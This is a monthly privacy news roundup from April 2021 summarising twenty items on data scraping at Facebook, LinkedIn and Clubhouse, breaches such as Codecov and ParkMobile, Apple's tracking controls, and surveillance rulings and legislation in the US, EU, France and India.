Privacy Roundup #0177 • April 2021
April 2021 was dominated by mass data scraping at Facebook, LinkedIn and Clubhouse, fresh regulatory pressure from Apple and Brussels, and rare government moves into private servers and the surveillance market.
1. Phone numbers of 533 million Facebook users posted to a hacker forum
A dataset holding the phone numbers, names and other profile details of 533 million Facebook users appeared for free on a low level hacking forum. Facebook said the information had been scraped through a contact importer flaw it had closed in 2019, but the records remained useful for phishing and account takeover.
2. Ireland opens a GDPR inquiry into the Facebook leak
The Irish Data Protection Commission launched an own volition inquiry into the leaked dataset under the GDPR and the Data Protection Act 2018. The regulator noted that Facebook had not told it about the underlying flaw when the company found and fixed the issue in 2019.
3. Scraped data on 500 million LinkedIn profiles offered for sale
A seller on a hacking forum advertised an archive built from roughly 500 million LinkedIn profiles, including names, email addresses, phone numbers and workplace details. LinkedIn said the data had been scraped from public profiles and aggregated from other sources rather than taken in a system breach.
4. Personal records of 1.3 million Clubhouse users dumped online
An SQL database with 1.3 million scraped Clubhouse user records, including user IDs, names, handles and the identity of the person who invited them, was posted for free on a hacker forum. Clubhouse said its systems had not been breached and that the data had been pulled from its API, which exposed public profile information to anyone with a token.
5. Apple's App Tracking Transparency arrives in iOS 14.5
Apple shipped App Tracking Transparency, which forces apps to ask permission before tracking users across other apps and websites. A refusal cuts off access to the advertising identifier that brokers and ad networks relied on, upending the mobile tracking economy.
6. FBI removes web shells from hacked Exchange servers without owners' consent
Acting on a court order from a Texas judge, the FBI accessed privately owned Microsoft Exchange servers and deleted web shells left behind by the Hafnium intrusions. The operation copied and removed the backdoors but did not patch the servers or notify owners in advance, an unusual reach into private systems.
7. Signal's chief turns the tables on police phone cracking firm Cellebrite
Signal founder Moxie Marlinspike published an analysis showing serious flaws in Cellebrite software used by police to extract data from seized phones. He argued that a crafted file placed on a device could corrupt Cellebrite reports, casting doubt on evidence the tool produces.
8. Europe proposes its first rules on artificial intelligence and biometric surveillance
The European Commission published a draft Artificial Intelligence Act that would restrict high risk systems and limit real time facial recognition in public spaces. Civil liberties groups argued the carve outs for law enforcement still left room for mass biometric surveillance.
9. Geico admits fraudsters scraped customers' driver's licence numbers
Geico disclosed that attackers had exploited its online quote system to steal customers' driver's licence numbers over several weeks. The insurer warned that the stolen numbers could be used to file fraudulent unemployment claims in victims' names.
10. Codecov discloses a months long supply chain compromise
Codecov revealed that an attacker had quietly altered its Bash Uploader script to siphon credentials and secrets out of customers' build pipelines. The tampering ran from January until early April and affected thousands of organisations, including several well known software firms.
11. Millions of dormant Pentagon IP addresses suddenly come alive
Minutes before the change of administration, an obscure Florida firm with no track record began announcing tens of millions of unused Defence Department IP addresses. The Pentagon later said it was assessing the address space for vulnerabilities, but could not explain why it chose that company.
12. Experian API exposed the credit scores of most Americans
A researcher found that a lender's website let anyone look up an Experian credit score by supplying only a name and postal address. The exposed API also returned risk factors, and the researcher feared the same flawed integration was in use across many other companies.
13. ParkMobile breach exposes data on 21 million app users
Account details for 21 million users of the parking app ParkMobile, including email addresses, dates of birth, phone numbers and licence plate numbers, went up for sale on a Russian language crime forum. ParkMobile said hashed passwords were taken but that the keys needed to crack them were not.
14. Senators introduce the Fourth Amendment Is Not For Sale Act
A bipartisan group of lawmakers introduced a bill to bar police and intelligence agencies from buying location and other data from brokers without a court order. The measure aimed to close a loophole that let agencies sidestep warrant requirements by purchasing information on the open market.
15. EFF launches a tool to check whether Chrome has joined Google's FLoC trial
The Electronic Frontier Foundation released Am I FLoCed, a site that tells visitors whether Google had enrolled their browser in its Federated Learning of Cohorts advertising experiment. Google had begun the trial on millions of Chrome users without asking for consent, and rival browsers moved to block the system.
16. Reverb data breach exposes musicians' personal details
The musical instrument marketplace Reverb began notifying customers after a researcher found an unsecured database holding more than five million records. The exposed information included names, postal addresses, phone numbers and email addresses of buyers and sellers.
17. France's top administrative court waters down EU surveillance limits
The Conseil d'Etat ruled on bulk telecommunications data retention in a way that let the French state keep retaining data indiscriminately. Digital rights groups said the decision sidestepped binding judgments of the Court of Justice of the European Union on mass surveillance.
→ edri.org
18. Indian brokerage Upstox confirms a breach of customer data
The trading platform Upstox disclosed that attackers had accessed sensitive customer information, including names, dates of birth, addresses and bank account details. Passwords had been stored as bcrypt hashes, but the breach still exposed extensive financial and identity data on more than a hundred thousand users.
19. Eversource exposes data on thousands of utility customers
The New England utility Eversource disclosed that a misconfigured cloud storage server had left customer files open to potential public access. The exposed records included names, addresses and Social Security numbers for thousands of customers.
20. Delhi High Court lets India's competition regulator probe WhatsApp's new privacy policy
A single judge of the Delhi High Court dismissed petitions from WhatsApp and Facebook that sought to halt a Competition Commission of India inquiry into the revised privacy policy. The court found no merit in the challenge and allowed the regulator to examine whether the data sharing terms abused WhatsApp's dominant market position.
Enjoyed this post?
Well, you could share the post with others, follow me with RSS Feeds and/or send me a comment via email.
Tags
Category:
Year: